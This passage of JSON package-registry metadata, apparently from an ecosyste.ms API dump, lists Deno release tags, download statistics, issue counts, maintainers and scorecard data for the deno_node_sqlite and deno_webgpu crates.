0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T00:47:11.992Z","dependent_packages_count":0,"downloads":37832,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":57.18683511488788,"dependent_repos_count":10.913176397351332,"dependent_packages_count":14.7970648053792,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":27.632358772539472},"purl":"pkg:cargo/deno_node_sqlite","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_node_sqlite","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_node_sqlite","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_node_sqlite/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_node_sqlite/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-03-04T18:06:12.114Z","updated_at":"2026-03-04T18:06:12.114Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-02-12T15:17:55.158Z","updated_at":"2026-02-12T15:17:55.158Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047758,"name":"deno_webgpu","ecosystem":"cargo","description":"WebGPU implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":227,"first_release_published_at":"2021-03-02T20:35:16.176Z","latest_release_published_at":"2026-08-06T11:46:07.228Z","latest_release_number":"0.224.0","last_synced_at":"2026-08-29T21:57:30.665Z","created_at":"2022-04-12T10:02:24.716Z","updated_at":"2026-08-29T21:57:30.666Z","registry_url":"https://crates.io/crates/deno_webgpu/","install_command":"cargo install deno_webgpu","documentation_url":"https://docs.rs/deno_webgpu/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets 